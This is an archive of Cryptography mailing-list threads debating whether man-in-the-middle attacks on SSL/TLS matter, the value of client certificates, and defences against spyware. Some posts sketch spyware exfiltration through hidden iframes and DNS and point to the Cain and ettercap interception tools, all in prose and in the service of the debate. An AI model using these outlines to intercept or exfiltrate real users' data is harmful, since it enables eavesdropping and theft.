Re: WYTM - but what if it was true?

2005-06-27 Thread Dan Kaminsky

If you are insisting that there is always
a way and that, therefore, the situation is
permanently hopeless such that the smart
ones are getting the hell out of the
Internet, I can go with that, but then
we (you and I) would both be guilty of
letting the best be the enemy of the good.
  

A reasonable critique.

It is not necessary though that there exists an acceptable solution that
keeps PC's with persistent stores secure.  A bootable CD from a bank is
an unexpectedly compelling option, as are the sort of services we're
going to see coming out of all those new net-connected gaming systems
coming out soon.

--Dan


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM - but what if it was true?

2005-06-27 Thread John Denker

On 06/27/05 00:28, Dan Kaminsky wrote:


... there exists an acceptable solution that
keeps PC's with persistent stores secure.  A bootable CD from a bank is
an unexpectedly compelling option


Even more compelling is:
 -- obtain laptop hardware from a trusted source
 -- obtain software from a trusted source
 -- throw the entire laptop into a GSA-approved safe when
  not being used.

This is a widely-used procedure for dealing with classified
data.


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM - but what if it was true?

2005-06-27 Thread Chris Kuethe
On 6/26/05, Dan Kaminsky [EMAIL PROTECTED] wrote:
 It is not necessary though that there exists an acceptable solution that
 keeps PC's with persistent stores secure.  A bootable CD from a bank is
 an unexpectedly compelling option, as are the sort of services we're
 going to see coming out of all those new net-connected gaming systems
 coming out soon.

You just know that people won't want to totally reboot their machines
every time they want to bank, because that'll break their
excel+quicken+msmoney integrated finances. So they try make a bootable
HD partition, or run it under vmware, or copy the trusted client
off. These of course cannot be allowed by the banks if they want to
preserve the illusion of their secure banking app...

And now we have a market for cracked trusted banking clients, both
for phishers and lazy people... it's game copy protection wars all
over again. :)

-- 
GDB has a 'break' feature; why doesn't it have 'fix' too?

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM - but what if it was true?

2005-06-24 Thread dan

What do you tell people to do?

commercial_message

Defense in depth, as always.  As an officer at
Verdasys, data-offload is something we block
by simply installing rules like Only these
two trusted applications can initiate outbound
HTTP where the word trusted means checksummed
and the choice of HTTP represents the most common
mechanism for spyware, say, to do the offload
of purloined information.  Put differently, 
if there 5,000 diseases but only two symptoms,
then symptomatic relief is the more cost-effective
approach rather than cure.  In this case, why do
I care if I have spyware if it can't talk to its
distant master?  (Why do I care if I have a tumor
if angiostatin keeps it forever smaller than 1mm
in diameter?)  Of course, there are details, and,
of course, I am willing to discuss them at far
greater length.

/commercial_message


--dan


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM - but what if it was true?

2005-06-24 Thread Dan Kaminsky
Dan--

I had something much more complicated, but it comes down to.

You trust Internet Explorer.
Spyware considers Internet Explorer crunchy, and good with ketchup.
Any questions?

A little less snarkily, Spyware can trivially use what MS refers to
as a Browser Helper Object (BHO) to alter all traffic on any web page. 
Inserting a 1x1 iframe in the corner of whatever, that does nothing but
transmit upstream data via HTTP image GETs, is trivial.  And if HTTP is
a bit too protected -- there's *always* DNS ;).  gethostbyname indeed.

--Dan

P.S.  Imagine for a moment it was profitable to give people cancer.  No,
not just a pesky side effect, but kind of the idea.  Angiostatin
wouldn't stand a chance.

[EMAIL PROTECTED] wrote:

What do you tell people to do?

commercial_message

Defense in depth, as always.  As an officer at
Verdasys, data-offload is something we block
by simply installing rules like Only these
two trusted applications can initiate outbound
HTTP where the word trusted means checksummed
and the choice of HTTP represents the most common
mechanism for spyware, say, to do the offload
of purloined information.  Put differently, 
if there 5,000 diseases but only two symptoms,
then symptomatic relief is the more cost-effective
approach rather than cure.  In this case, why do
I care if I have spyware if it can't talk to its
distant master?  (Why do I care if I have a tumor
if angiostatin keeps it forever smaller than 1mm
in diameter?)  Of course, there are details, and,
of course, I am willing to discuss them at far
greater length.

/commercial_message


--dan


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
  



-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM - but what if it was true?

2005-06-24 Thread dan

Dan Kaminsky writes:
 | Dan--
 |
 | I had something much more complicated, but it comes down to.
 |
 | You trust Internet Explorer.
 | Spyware considers Internet Explorer crunchy, and good with ketchup.
 | Any questions?
 |
 | A little less snarkily, Spyware can trivially use what MS refers to
 | as a Browser Helper Object (BHO) to alter all traffic on any web page.
 | Inserting a 1x1 iframe in the corner of whatever, that does nothing but
 | transmit upstream data via HTTP image GETs, is trivial.  And if HTTP is
 | a bit too protected -- there's *always* DNS ;).  gethostbyname indeed.
 |
 | P.S.  Imagine for a moment it was profitable to give people cancer.  No,
 | not just a pesky side effect, but kind of the idea.  Angiostatin
 | wouldn't stand a chance.
 |


If you are insisting that there is always
a way and that, therefore, the situation is
permanently hopeless such that the smart
ones are getting the hell out of the
Internet, I can go with that, but then
we (you and I) would both be guilty of
letting the best be the enemy of the good.

commercial

  However, I/we routinely disable all use of
  BHOs, prevent mod of any entity as chosen
  by filename extension, checksum, or filesystem
  location, and whitelist applications, to name
  a _few_.  For the genuinely paranoid, regular
  (like every few hours) reboot to a new VM is
  also enforceable and recommended, especially
  if you care about attacks that are purely
  in-memory and which do not leave behind any
  payload such as to aid an attacker on his/her
  proposed second visit.  If you indeed are an
  I don't need no stinkin' payload sort of
  guy, like the folks who eschew carrying matches
  because you can always light a fire rubbing
  two sticks together, make me a suggestion;
  I love free consulting.

/commercial

--dan


=
Internet Explorer is the most dangerous program ever written.
  -- Rik Farrow to Scott Charney during the audience grilling stage of 
 http://www.usenix.org/events/usenix04/tech/sigs.html#mono_debate



-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


WYTM - but what if it was true?

2005-06-22 Thread Ian Grigg
A highly aspirated but otherwise normal watcher of black helicopters asked:

 Any idea if this is true?
  (WockerWocker, Wed Jun 22 12:07:31 2005)
 http://c0x2.de/lol/lol.html

Beats me.  But what it if it was true.  What's your advice to
clients?

iang
-- 
Advances in Financial Cryptography, Issue 1:
   https://www.financialcryptography.com/mt/archives/000458.html
Daniel Nagy, On Secure Knowledge-Based Authentication
Adam Shostack, Avoiding Liability: An Alternative Route to More Secure Products
Ian Grigg, Pareto-Secure

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM - but what if it was true?

2005-06-22 Thread Ben Laurie

Allan Liska wrote:

3. Use an on-screen keyboard.


For extra points, try Dasher.

http://www.inference.phy.cam.ac.uk/dasher/

--
ApacheCon Europe   http://www.apachecon.com/

http://www.apache-ssl.org/ben.html   http://www.thebunker.net/

There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit. - Robert Woodruff

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-11-12 Thread Ian Grigg
Tom Weinstein wrote:

 The economic view might be a reasonable view for an end-user to take,
 but it's not a good one for a protocol designer. The protocol designer
 doesn't have an economic model for how end-users will end up using the
 protocol, and it's dangerous to assume one. This is especially true for
 a protocol like TLS that is intended to be used as a general solution
 for a wide range of applications.


I agree with this.  Especially, I think we are
all coming to the view that TLS/SSL is in fact
a general purpose channel security protocol,
and should not be viewed as being designed to
protect credit cards or e-commerce especially.

Given this, it is unreasonable to talk about
threat models at all, when discussing just the
protocol.  I'm coming to the view that protocols
don't have threat models, they only have
characteristics.  They meet requirements, and
they get deployed according to the demands of
higher layers.

Applications have threat models, and in this is
seen the mistake that was made with the ITM.
Each application has to develop its own threat
model, and from there, its security model.

Once so developed, a set of requirements can
be passed on to the protocol.  Does SSL/TLS
meet the requirements passed on from on high?
That of course depends on the application and
what requirements are set.

So, yes, it is not really fair for a protocol
designer to have to undertake an economic
analysis, as much as they don't get involved
in threat models and security models.  It's
up to the application team to do that.

Where we get into trouble a lot in the crypto
world is that crypto has an exaggerated
importance, an almost magical property of
appearing to make everything safe.  Designers
expect a lot from cryptographers for these
reasons.  Too much, really.  Managers demand
some special sprinkling of crypto fairy dust
because it seems to make the brochure look
good.

This will always be a problem.  Which is why
it's important for the crypto guy to ask the
question - what's *your* threat model?  Stick
to his scientific guys, as it were.


 In some ways, I think this is something that all standards face. For any
 particular application, the standard might be less cost effective than a
 custom solution. But it's much cheaper to design something once that
 works for everyone off the shelf than it would be to custom design a new
 one each and every time.


Right.  It is however the case that secure
browsing is facing a bit of a crisis in
security.  So, there may have to be some
changes, one way or another.

iang

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-11-12 Thread Peter Gutmann
Perry E. Metzger [EMAIL PROTECTED] writes:

TLS is just a pretty straightforward well analyzed protocol for protecting a
channel -- full stop. It can be used in a wide variety of ways, for a wide
variety of apps. It happens to allow you to use X.509 certs, but if you
really hate X.509, define an extension to use SPKI or SSH style certs. TLS
will accommodate such a thing easily. Indeed, I would encourage you to do
such a thing.

Actually there's no need to even extend TLS, there's a standard and very
simple technique which is probably best-known from its use in SSH but has been
in use in various other places as well:

1. The first time your server fires up, generate a self-signed cert.

2. When the user connects, have them verify the cert out-of-band via its
   fingerprint.  Even a lower-security simple phrase or something derived from
   the fingerprint is better than nothing.

3. For subsequent connections, warn if the cert fingerprint has changed.

That's currently being used by a number of TLS-using apps, and works at least
as well as any other mechanism.  At a pinch, you can even omit (2) and just
warn if a key that doesn't match the one first encountered is used, that'll
catch everything but an extremely consistent MITM.  Using something like SSH
keys isn't going to give you any magical security that X.509 certs doesn't,
you'll just get something equivalent to the above mechanism.

Peter.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-11-12 Thread Anton Stiglic

- Original Message - 
From: Tom Otvos [EMAIL PROTECTED]

 As far as I can glean, the general consensus in WYTM is that MITM attacks
are very low (read:
 inconsequential) probability.

I'm not certain this was the consensus.

We should look at the scenarios in which this is possible, and the tools
that
are available to accomplish the attack.  I would say that the attack is more
easily done inside a local network (outside the network you have to get
control
of the ISP or some node, and this is more for the elite).
But statistics show that most exploits are accomplished because of employees
within a company (either because they are not aware of basic security
principals,
or because the malicious person was an employee within), so I find this
scenario
(attack from inside the network) to be plausible.

Take for an example a large corporation of 100 or more employees, there has
got to be a couple of people that do on-line purchasing from work, on-line
banking, etc...  I would say that it is possible that an employee (just
curious, or
really malicious) would want to intercept these communications

So how difficult is it to launch an MITM attack on https?  Very simple it
seems.  My hacker friends pointed out to me two softwares, ettercap and
Cain:
http://ettercap.sourceforge.net/
http://www.oxid.it/cain.html

Cain is the newest I think, and remarkably simple to use.  It has a very
nice
GUI and it doesn't take much hacking ability to use it.  I've been using it
recently for educational purposes and find it very easy to use, and I don't
consider myself a hacker.

Cain allows you to do MITM (in HTTPS, DNS and SSHv1) on a local
network.  It can generate certificates in real time with the same common
name as the original.  The only thing is that the certificate will probably
not
be signed by a trusted CA, but most users are not security aware and
will just continue despite the warning.

So given this information, I think MITM threats are real.  Are these attacks
being done in practice?  I don't know, but I don't think they would easily
be reported if they were, so you  can guess what my conclusion is...

--Anton



-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


RE: SSL, client certs, and MITM (was WYTM?)

2003-11-12 Thread Anne Lynn Wheeler
Internet groups starts anit-hacker initiative
http://www.computerweekly.com/articles/article.asp?liArticleID=125823liArti 
cleTypeID=1liCategoryID=2liChannelID=22liFlavourID=1sSearch=nPage=1

one of the threats discussed in the above is the domain name ip-address 
take-over mentioned previously
http://www.garlic.com/~lynn/aadsm15.htm#28

which was one of the primary justifications supposedly for SSL deployment 
(am i really talking to the server that I think i'm talking to).
--
Anne  Lynn Wheelerhttp://www.garlic.com/~lynn/
Internet trivia 20th anv http://www.garlic.com/~lynn/rfcietff.htm
 

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-11-12 Thread David Honig
At 07:11 PM 10/22/03 -0400, Perry E. Metzger wrote:

Indeed. Imagine if we waited until airplanes exploded regularly to
design them so they would not explode, or if we had designed our first
suspension bridges by putting up some randomly selected amount of
cabling and seeing if the bridge collapsed. That's not how good
engineering works.

No.  But how quickly we forget how many planes *did* break up,
how many bridges *did* fall apart, because engineering sometimes
goes into new territory.

Even now.  You start using new composite materials in planes, and wonder why
they fall out of the sky when their tails snap off.  
Eventually (though not yet) Airbus et al
will get a clue how they fail differently from familiar metals.  
Even learning about now-mundane metal fatigue in planes involved
breakups and death.

(Safety) engineering *is* (unfortunately, but perhaps by practical necessity)
somewhat reactive.  It tries very hard not to be, but it is.

dh





-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-11-12 Thread Anton Stiglic
 I'm not sure how you come to that conclusion.  Simply
 use TLS with self-signed certs.  Save the cost of the
 cert, and save the cost of the re-evaluation.
 
 If we could do that on a widespread basis, then it
 would be worth going to the next step, which is caching
 the self-signed certs, and we'd get our MITM protection
 back!  Albeit with a bootstrap weakness, but at real
 zero cost.

I know of some environments where this is done.  For example
to protect the connection to a corporate mail server, so that 
employees can read their mail from outside of work.  The caching 
problem is easily solved in this case by having the administrator 
distribute the self-signed cert to all employees and having them 
import it and trust it.  This costs no more than 1 man day per year.

This is near 0 cost however, and gives some weight to Perry's
argument.

 Any merchant who wants more, well, there *will* be
 ten offers in his mailbox to upgrade the self-signed
 cert to a better one.  Vendors of certs may not be
 the smartest cookies in the jar, but they aren't so
 dumb that they'll miss the financial benefit of self-
 signed certs once it's been explained to them.

I have a hard time believing that a merchant (who plans
to make $ by providing the possibility to purchase on-line)
cannot spend something like 1000$ [1] a year for an SSL 
certificate, and that the administrator is not capable of 
properly installing it within 1-2 man days.  If he can't install
it, just get a consultant to do it, you can probably get one
that does it within a day and charges no more than 1000$.

So that would make the total around 2000$ a year, let's 
generously round it up to 10K$ annum.
I think your 10-100 million $ annum estimate is a bit 
exaggerated...


[1] this is the price I saw at Verisign
http://www.verisign.com/products/site/commerce/index.html
I'm sure you can get it for cheaper. This was already 
discussed on this list I think...

--Anton

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-23 Thread David Wagner
Thor Lancelot Simon  wrote:
Can you please posit an *exact* situation in which a man-in-the-middle
could steal the client's credit card number even in the presence of a
valid server certificate?

Sure.  If I can assume you're talking about SSL/https as it is
typically used in ecommerce today, that's easy.  Subvert DNS to
redirect the user to a site under controller of the attacker.
Then it doesn't matter whether the legitimate site has a valid server
cert or not.  Is this the kind of scenario you were looking for?

http://lists.insecure.org/lists/bugtraq/1999/Nov/0202.html

Can you please explain *exactly* how using a
client-side certificate rather than some other form of client authentication
would prevent this?

Gonna make me work harder on this one, eh?  Well, ok, I'll give it a try.
Here's one possible way that you might be able to use client certs to
help (assuming client certs were usable and well-supported by browsers).
Beware: I'm making this one up as I go, so it's entirely possible there
are security flaws with my proposal; I'd welcome feedback.

When I establish a credit card with Visa, I generate a new client
certificate for this purpose and register it with www.visa.com.  When I
want to buy a fancy hat from www.amazon.com, Amazon re-directs me to
  https://ssl.visa.com/buy.cgi?payto=amazonamount=$29.99item=hat
My web browser opens a SSL channel to Visa's web server, authenticating my
presence using my client cert.  Visa presents me a description of the item
Amazon claims I want to buy, and asks me to confirm the request over that
authenticated channel.  If I confirm it, Visa forwards payment to Amazon
and debits my account.  Visa can tell whose account to debit by looking
at the mapping between my client certs and account numbers.  If Amazon
wants to coordinate, it can establish a separate secure channel with Visa.
(Key management for vendors is probably easier than for customers.)

I can't see any MITM attacks against this protocol.  The crucial point is
that Visa will only initiate payment if it receives confirmation from me,
over a channel where Visa has authenticated that I'm on the other end,
to do so.  A masquerading server doesn't learn any secrets that it can
use to authorize bogus transactions.

Does this work?

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Tom Otvos
I read the WYTM thread with great interest because it dovetailed nicely with some 
research I am
currently involved in.  But I would like to branch this topic onto something specific, 
to see what
everyone here thinks.

As far as I can glean, the general consensus in WYTM is that MITM attacks are very low 
(read:
inconsequential) probability.  Is this *really* true?  I came across this paper last 
year, at the
SANS reading room:

http://rr.sans.org/threats/man_in_the_middle.php

I found it both fascinating and disturbing, and I have since confirmed much of what it 
was
describing.  This leads me to think that an MITM attack is not merely of academic 
interest but one
that can occur in practice.  With sufficiently simplified tools this type of attack 
can readily be
launched by script kiddies or someone only just slightly higher on the hacker 
evolutionary scale.

Having said that then, I would like to suggest that one of the really big flaws in the 
way SSL is
used for HTTP is that the server rarely, if ever, requires client certs.  We all seem 
to agree that
convincing server certs can be crafted with ease so that a significant portion of the 
Web population
can be fooled into communicating with a MITM, especially when one takes into account 
Bruce
Schneier's observations of legitimate uses of server certs (as quoted by Bryce 
O'Whielacronx).  But
as long as servers do *no* authentication on client certs (to the point of not even 
asking for
them), then the essential handshaking built into SSL is wasted.

I can think of numerous online examples where requiring client certs would be a good 
thing: online
banking and stock trading are two examples that immediately leap to mind.  So the 
question is, why
are client certs not more prevalent?  Is is simply an ease of use thing?  Since the 
Internet threat
model upon which SSL is based makes the assumption that the channel is *not* secure, 
why is MITM
not taken more seriously?  Why, if SSL is designed to solve a problem that can be 
solved, namely
securing the channel (and people are content with just that), are not more people 
jumping up and
down yelling that it is being used incorrectly?

Am I missing something obvious here?  I look forward to any comments you might have.

-- Tom Otvos

Don't think you are. Know you are. - Morpheus


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Ian Grigg
Tom Otvos wrote:

 As far as I can glean, the general consensus in WYTM is that MITM attacks are very 
 low (read:
 inconsequential) probability.  Is this *really* true?


The frequency of MITM attacks is very low, in the sense
that there are few or no reported occurrences.  This
makes it a challenge to respond to in any measured way.


 I came across this paper last year, at the
 SANS reading room:
 
 http://rr.sans.org/threats/man_in_the_middle.php
 
 I found it both fascinating and disturbing, and I have since confirmed much of what 
 it was
 describing.  This leads me to think that an MITM attack is not merely of academic 
 interest but one
 that can occur in practice.


Nobody doubts that it can occur, and that it *can*
occur in practice.  It is whether it *does* occur
that is where the problem lies.

The question is one of costs and benefits - how much
should we spend to defend against this attack?  How
much do we save if we do defend?

[ Mind you, the issues that are raised by the paper
are to do with MITM attacks, when SSL/TLS is employed
in an anti-MITM role.  (I only skimmed it briefly I
could be wrong.)  We in the SSL/TLS/secure browsing
debate have always assumed that SSL/TLS when fully
employed covers that attack - although it's not the
first time I've seen evidence that the assumption
is unwarranted. ]


 Having said that then, I would like to suggest that one of the really big flaws in 
 the way SSL is
 used for HTTP is that the server rarely, if ever, requires client certs.  We all 
 seem to agree that
 convincing server certs can be crafted with ease so that a significant portion of 
 the Web population
 can be fooled into communicating with a MITM, especially when one takes into account 
 Bruce
 Schneier's observations of legitimate uses of server certs (as quoted by Bryce 
 O'Whielacronx).  But
 as long as servers do *no* authentication on client certs (to the point of not even 
 asking for
 them), then the essential handshaking built into SSL is wasted.
 
 I can think of numerous online examples where requiring client certs would be a good 
 thing: online
 banking and stock trading are two examples that immediately leap to mind.  So the 
 question is, why
 are client certs not more prevalent?  Is is simply an ease of use thing?


I think the failure of client certs has the same
root cause as the failure of SSL/TLS to branch
beyond its mandated role of protecting e-
commerce.  Literally, the requirement that
the cert be supplied (signed) by a third party
killed it dead.  If there had been a button on
every browser that said generate self-signed
client cert now then the whole world would be
using them.

Mind you, the whole client cert thing was a bit
of an afterthought, wasn't it?  The orientation
that it was at server discretion also didn't help.


 Since the Internet threat
 model upon which SSL is based makes the assumption that the channel is *not* 
 secure, why is MITM
 not taken more seriously?


People often say that there are no successful MITM
attacks because of the presence of SSL/TLS !

The existance of the bugs in Microsoft browsers
puts the lie to this - literally, nobody has bothered
with MITM attacks, simply because they are way way
down on the average crook's list of sensible things
to do.

Hence, that rant was in part intended to separate
out 1994's view of threat models to today's view
of threat models.  MITM is simply not anywhere in
sight - but a whole heap of other stuff is!

So, why bother with something that isn't a threat?
Why can't we spend more time on something that *is*
a threat, one that occurs daily, even hourly, some
times?


 Why, if SSL is designed to solve a problem that can be solved, namely
 securing the channel (and people are content with just that), are not more people 
 jumping up and
 down yelling that it is being used incorrectly?


Because it's not necessary.  Nobody loses anything
much over the wire, that we know of.  There are
isolated cases of MITMs in other areas, and in
hacker conferences for example.  But, if 10 bit
crypto and ADH was used all the time, it would
still be the least of all risks.


iang

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


RE: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Tom Otvos

 So what purpose would client certificates address? Almost all of the use
 of SSL domain name certs is to hide a credit card number when a consumer
 is buying something. There is no requirement for the merchant to
 identify and/or authenticate the client  the payment infrastructure
 authenticates the financial transaction and the server is concerned
 primarily with getting paid (which comes from the financial institution)
 not who the client is.


The CC number is clearly not hidden if there is a MITM.  I think the I got my money 
so who cares
where it came from argument is not entirely a fair representation.  Someone ends up 
paying for
abuses, even if it is us in CC fees, otherwise why bother encrypting at all?  But that 
is besides
the point.

 So, there are some infrastructures that have web servers that want to
 authenticate clients (for instance online banking). They currently
 establish the SSL session and then authenticate the user with
 userid/password against an online database.


These are, I think, more important examples and again, if there is a MITM, then doing 
additional
authentication post-channel setup is irrelevant. These can be easily replayed after 
the attack has
completed.  The authentication *should* be deeply tied to channel setup, should it 
not?  Or stated
another way, having chained authentication where the first link in the chain is 
demonstrably weak
doesn't seem to achieve an awful lot.


 There was an instance of a bank issuing client certificates for use in
 online banking. At one time they claimed to have the largest issued PKI
 client certificates (aka real PKI as opposed to manufactured
 certificates).

 However, they discovered

 1) the certificates had to be reduced back to relying-party-only
 certificates with nothing but an account number (because of numerous
 privacy and liability concerns)

 2) the certificates quickly became stale

 3) they had to look up the account and went ahead and did a separate
 password authentication  in part because the certificates were
 stale.

 They somewhat concluded that the majority of client certificate
 authentication aren't being done because they want the certificates 
 it is because the available COTS software implements it that way (if you
 want to use public key) ... but not because certificates are in anyway
 useful to them (in fact, it turns out that the certificates are
 redundant and superfluous ... and because of the staleness issue
 resulted in them also requiring passwords).


Fascinating!  Can you please tell me what bank that was?

-- tomo

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread John S. Denker
On 10/22/2003 04:33 PM, Ian Grigg wrote:

 The frequency of MITM attacks is very low, in the sense that there
 are few or no reported occurrences.
We have a disagreement about the facts on this point.
See below for details.
 This makes it a challenge to
 respond to in any measured way.
We have a disagreement about the philosophy of how to
measure things.  One should not design a bridge according
to a simple measurement of the amount of cross-river
traffic in the absence of a bridge.  One should not approve
a launch based on the observed fact that previous instances
of O-ring failures were non-fatal.
Designers in general, and cryptographers in particular,
ought to be proactive.
But this philosophy discussion is a digression, because
we have immediate practical issues to deal with.
 Nobody doubts that it can occur, and that it *can* occur in practice.
 It is whether it *does* occur that is where the problem lies.
According to the definitions I find useful, MITM is
basically a double impersonation.  For example,
Mallory impersonates PayPal so as to get me to
divulge my credit-card details, and then impersonates
me so as to induce my bank to give him my money.
This threat is entirely within my threat model.  There
is nothing hypothetical about this threat.  I get 211,000
hits from
  http://www.google.com/search?q=ID-theft
SSL is distinctly less than 100% effective at defending
against this threat.  It is one finger in a dike with
multiple leaks.  Client certs arguably provide one
additional finger ... but still multiple leaks remain.
==

The expert reader may have noticed that there are
other elements to the threat scenario I outlined.
For instance, I interact with Mallory for one seemingly
trivial transaction, and then he turns around and
engages in numerous and/or large-scale transactions.
But this just means we have more than one problem.
A good system would be robust against all forms
of impersonation (including MITM) *and* would be
robust against replays *and* would ensure that
trivial things and large-scale things could not
easily be confused.  Et cetera.
-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


RE: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Anne Lynn Wheeler
At 05:08 PM 10/22/2003 -0400, Tom Otvos wrote:

The CC number is clearly not hidden if there is a MITM.  I think the I 
got my money so who cares
where it came from argument is not entirely a fair 
representation.  Someone ends up paying for
abuses, even if it is us in CC fees, otherwise why bother encrypting at 
all?  But that is besides
the point.
the statement was SSL domain name certificate is

1) am i really talking to who I think I'm talking to
2) encrypted channel
obviously #1 addresses MITM (am i really talking to who I think I'm talking 
to).

The issue for CC is that it really is a shjared secret and is extremely 
vulnerable ... as I've commented before

1) CC needs to be in the clear in a dozen or so business processes
2) much simpler to harvest a whole merchant file with possibly millions of 
CC numbers in about the same effort to evesdrop one off the net (even if 
there was no SSL) return on investment  for approx. same amount of 
effort get one CC number or get millions
3) all the instances in the press are in fact involved with harvesting 
large files of numbers ... not one or two at a time off the wire
4) burying the earth in miles of crypto still wouldn't eliminate the 
current shared-secret CC problem

slightly related  security proportional to risk:
http://www.garlic.com/~lynn/2001h.html#61
so the requirement given the X9 financial standards working group X9A10
http://www.x9.org/
was to preserve the integrity of the financial infrastructure for all 
electronic retail payment (regardless of kind, origin, method, etc). The 
result was X9.59 standard
http://www.garlic.com/~lynn/index.html#x959

which effectively defines a digitally signed, authenticated transaction 
 no certificate required ... and the CC number used in X9.59 
authenticated transactions shouldn't be used in non-authenticated 
transactions. Since the transaction is now digitally signed transactions 
and the CC# can't be used in non-authenticated transactions  you can 
listen in on X9.59 transactions and harvest all the CC# that you want to 
and it doesn't help with doing fraudulent transactions. In effect, X9.59 
changes the business rules so that CC# no longer need to be treated as 
shared secrets.

misc. past stuff about ssl domain name certificates
http://www.garlic.com/~lynn/subpubkey.html#sslcert
misc. past stuff about relying-party-only certificates
http://www.garlic.com/~lynn/subpubkey.html#rpo
misc. past stuff about using certificateless digital signatures in radius 
authentication
http://www.garlic.com/~lynn/subpubkey.html#radius

misc. past stuff about using certificateless digital signatures in kerberos 
authentication
http://www.garlic.com/~lynn/subpubkey.html#kerberos

misc. fraud  exploits (including some number of cc related press 
announcements)
http://www.garlic.com/~lynn/subtopic.html#fraud

some discussion of early SSL deployment for what is now referred to as 
electronic commerce
http://www.garlic.com/~lynn/aadsm5.htm#asrn2
http://www.garlic.com/~lynn/aadsm5.htm#asrn3

--
Anne  Lynn Wheelerhttp://www.garlic.com/~lynn/
Internet trivia 20th anv http://www.garlic.com/~lynn/rfcietff.htm
 

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


RE: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Tom Otvos

 Nobody doubts that it can occur, and that it *can*
 occur in practice.  It is whether it *does* occur
 that is where the problem lies.


Or, whether it gets reported if it does occur.

 The question is one of costs and benefits - how much
 should we spend to defend against this attack?  How
 much do we save if we do defend?


Absolutely true.  If the only effect of a MITM is loss of privacy, then that is 
certainly a
lower-priority item to fix than some quick cash scheme.  So the threat model needs 
to clearly
define who the bad guys are, and what their motivations are.  But then again, if I am 
the victim of
a MITM attack, even if the bad guy did not financially gain directly from the attack 
(as in, getting
my money or something for free), I would consider loss of privacy a significant 
thing. What if an
attacker were paid by someone (indirect financial gain) to ruin me by buying a bunch 
of stock on
margin?  Maybe not the best example, but you get the idea.  It is not an attack that 
affects
millions of people, but to the person involved, it is pretty serious.  Shouldn't the 
server in
this case help mitigate this type of attack?


 So, why bother with something that isn't a threat?
 Why can't we spend more time on something that *is*
 a threat, one that occurs daily, even hourly, some
 times?


I take your point, but would suggest isn't a threat be replaced by doesn't threaten 
the
majority.  And are we at a point where it needs to be a binary thing -- fix this OR 
that but NOT
both?

-- tomo

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread David Wagner
Tom Otvos wrote:
As far as I can glean, the general consensus in WYTM is that MITM
attacks are very low (read:
inconsequential) probability.  Is this *really* true?

I'm not aware of any such consensus.
I suspect you'd get plenty of debate on this point.
But in any case, widespread exploitation of a vulnerability
shouldn't be a prerequisite to deploying countermeasures.

If we see a plausible future threat and the stakes are high enough,
it is often prudent to deploy defenses in advance against the possibility
that attackers.  If we wait until the attacks are widespread, it may be
too late to stop them.  It often takes years (or possibly a decade or more:
witness IPSec) to design and widely deploy effective countermeasures.

It's hard to predict with confidence which of the many vulnerabilities
will be popular among attackers five years from now, and I've been very wrong,
in both directions, many times.  In recognition of our own fallibility at
predicting the future, the conclusion I draw is that it is a good idea
to be conservative.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Perry E. Metzger

Ian Grigg [EMAIL PROTECTED] writes:
 Nobody doubts that it can occur, and that it *can*
 occur in practice.  It is whether it *does* occur
 that is where the problem lies.
 
 The question is one of costs and benefits - how much
 should we spend to defend against this attack?  How
 much do we save if we do defend?

I have to find I find this argument very odd.

You argue that TLS defends against man in the middle attacks, but that
we do not observe man in the middle attacks, so why do we need the
defense?

Well, we don't observe the attacks much because they are hard to
undertake. Make them easy and I am sure they would happen
frequently. Protocols subject to such attacks are frequently subjected
to them, and there are whole suites of tools you can download to help
you in intercepting traffic to facilitate them.

You argue that we have to make a cost/benefit analysis, but we're
talking about computer algorithms where the cost is miniscule if it
is measurable at all. Why should we use a second-best practice when a
best practice is in reality no more expensive?

